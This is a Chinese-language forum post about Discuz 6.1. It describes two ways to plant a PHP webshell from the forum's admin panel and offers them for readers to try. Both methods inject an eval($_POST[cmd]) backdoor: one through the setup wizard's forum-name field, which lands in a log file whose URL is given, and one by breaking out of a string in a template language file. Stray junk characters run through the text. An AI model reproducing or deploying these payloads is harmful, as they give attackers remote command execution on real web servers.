discuz6.1两种方法后台拿shell
& u, ^" q& A6 e好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下/ d' g1 |, D/ N- `' K
1:" r% P9 _: K- O$ j
http://127.0.0.1/discuz/admincp. ... zard&frames=yes
1 Z2 q `9 R0 B+ X- @admincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell
8 J5 G$ q* T ?7 L! D2 u+ ^4 A3 c<?php eval($_POST[cmd]);?>
+ r6 n0 e; G3 b( }- y0 C& P- a6 J后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php! _ A0 q. C% X6 n& h9 M4 N1 M/ W
3 x$ K! r$ L6 c& Z: Z0 f% ?
* z4 F$ p' Z& m; W: z0 f7 Z$ b* }
2:后台模板管理--默认模板套系--详情
6 l+ t) u! V0 h- {1 M4 Q4 F& ]8 Rtemplates/default/actions.lang.php) ]; i9 ]& ?1 U& Q& s
jhackj\\');eval($_POST[cmd])?>;//
" d6 y& _' s+ L
" f" `' T0 b) q利用很简单,聪明的人一看就懂了 |
发表于 2012-9-13 16:59:17
收藏
支持
反对